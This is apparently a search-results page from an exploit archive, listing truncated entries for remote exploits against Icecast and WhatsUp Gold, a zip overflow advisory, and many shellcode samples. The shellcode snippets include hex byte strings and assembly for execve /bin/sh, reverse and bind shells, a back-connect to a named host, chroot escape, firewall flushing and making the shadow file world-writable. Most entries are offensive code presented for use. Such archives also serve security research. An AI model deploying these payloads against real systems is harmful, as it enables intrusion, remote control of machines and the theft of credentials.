7257 matches found
Icecast <= 2.0.1 Win32 Remote Code Execution Exploit
No description provided by source. / by Luigi Auriemma Shellcode add-on by Delikon www.Delikon.de Because of all the forbidden bytes in a http get request i had to use a very small shellcode, which was blown up by Msf::Encoder::PexAlphaNum. Great encoder...
IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5 ================================================ IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit ================================================ Exploit by ET LoWNOISE Colombia etatcyberspace.org Oct/2004...
zip -- long path buffer overflow
A HexView security advisory reports: When zip performs recursive folder compression, it does not check for the length of resulting path. If the path is too long, a buffer overflow occurs leading to stack corruption and segmentation fault. It is possible to exploit this vulnerability by embedding ...
solaris/SPARC execve /bin/sh 52 bytes
Exploit for solaris/sparc platform in category shellcode ===================================== solaris/SPARC execve /bin/sh 52 bytes ===================================== //Solaris/Sparc - LSD char shellcode= "\x20\xbf\xff\xff" / bn,a / "\x20\xbf\xff\xff" / bn,a / "\x7f\xff\xff\xff" / call /...
bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes
Exploit for bsd/x86 platform in category shellcode ============================================= bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes ============================================= / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net...
Unixware execve /bin/sh 95 bytes
Exploit for unixware platform in category shellcode ================================ Unixware execve /bin/sh 95 bytes ================================ / UnixWare execve of /bin/sh by K2 / char shell = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"...
linux/x86 execve /bin/sh IA32 0xff-less 45 bytes
linux/x86 execve /bin/sh IA32 0xff-less 45 bytes. Shellcode exploit for linx86 platform / 0xff-less execve /bin/sh by anathema / include include unsigned char code = / Linux/IA32 0xff-less execve shellcode. / "\x89\xe6" / movl %esp, %esi / "\x83\xc6\x30" / addl $0x30, %esi / "\xb8\x2e\x62\x69\x6e...
linux/x86 Reverse telnet 134 bytes
No description provided by source. / Reverse Telnet Shellcode by hts / / jmp 0x31 popl %esi movl %esi,0x4f%esi leal 0x8%esi,%ebx movl %ebx,0x53%esi leal 0xb%esi,%ebx movl %ebx,0x57%esi xorl %eax,%eax movb %eax,0x7%esi movb %eax,0xa%esi movb %eax,0x4e%esi movl %eax,0x5b%esi movb $0xb,%al movl...
bsd/x86 break chroot 45 bytes
Exploit for bsd/x86 platform in category shellcode ============================= bsd/x86 break chroot 45 bytes ============================= / BSD version FreeBSD, OpenBSD, NetBSD. email protected 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" ...
bsd/x86 portbind port 31337 83 bytes
No description provided by source. / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx "\x6a\x01" // pushl $0x01 "\x6a\x02" // pushl $0x02 "\xb0\x61" // movb $0x61,%al "\x50" // pushl %eax "\xcd\x80" // int $0x80 "\x52" ...
linux/x86 ipchains -F 49 bytes
Exploit for linux/x86 platform in category shellcode ============================== linux/x86 ipchains -F 49 bytes ============================== include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cer...
bsd/x86 - reverse portbind 129 bytes
bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsdx86 platform / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41,...
linux/x86 execve /bin/sh IA32 0xff-less 45 bytes
Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 execve /bin/sh IA32 0xff-less 45 bytes ================================================ / 0xff-less execve /bin/sh by anathema / include include unsigned char code = / Linux/IA32...
bsd/x86 - connect 93 bytes
bsd/x86 connect 93 bytes. Shellcode exploit for bsdx86 platform / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: po...
os-x/PPC execve /bin/sh 72 bytes
Exploit for os-x/ppc platform in category shellcode ================================ os-x/PPC execve /bin/sh 72 bytes ================================ / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does execve/bin/sh; exit0; See ASM below. 72 Bytes. / char shellcode =...
freebsd/x86 kldload /tmp/o.o 74 bytes
Exploit for freebsd/x86 platform in category shellcode ===================================== freebsd/x86 kldload /tmp/o.o 74 bytes ===================================== / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net...
bsd/x86 connect 93 bytes
Exploit for bsd/x86 platform in category shellcode ======================== bsd/x86 connect 93 bytes ======================== / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id...
linux/x86 chmod 666 shadow ENCRYPT 75 bytes
Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 chmod 666 shadow ENCRYPT 75 bytes =========================================== / !!!!!! ANTI IDS SHELLCODE !!!!!! email protected 0x17abril0x7d2 !!!!! ENCRIPTADA !!!!! 75 bytes chmod 666...
solaris/SPARC portbind port 6789 228 bytes
No description provided by source. / Solaris shellcode - connects /bin/sh to a port Claes M. Nyberg 20020624 [email protected], [email protected] / include string.h / void mainvoid asm" ! Server address xor %l1, %l1, %l1 ! l1 = 0 st %l1, %sp - 12 ! 0 = INADDRANY mov 0x2, %l1 ! AFINET sth...
linux/x86 symlink . /bin/sh 32 bytes
linux/x86 symlink . /bin/sh 32 bytes. Shellcode exploit for linx86 platform /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version size = 32 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme mai...